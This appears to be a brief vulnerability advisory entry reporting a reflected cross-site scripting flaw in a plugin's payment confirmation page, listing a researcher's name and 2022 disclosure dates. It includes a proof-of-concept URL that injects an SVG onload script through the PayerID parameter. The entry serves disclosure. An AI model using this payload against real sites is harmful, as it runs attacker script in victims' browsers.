The plugin does not sanitise and escape some parameters from the payment confirmation page before outputting them back in the page, leading to a Reflected Cross-Site Scripting issue
https://example.com/purchase/confirm-payment/?order=order-xxxxxxx&PayerID=aa"><svg/onload=alert(/XSS/)>
Brandon James Roldan
Brandon James Roldan
Yes
2022-04-04 (about 3 months ago)
2022-04-06 (about 2 months ago)
2022-04-13 (about 2 months ago)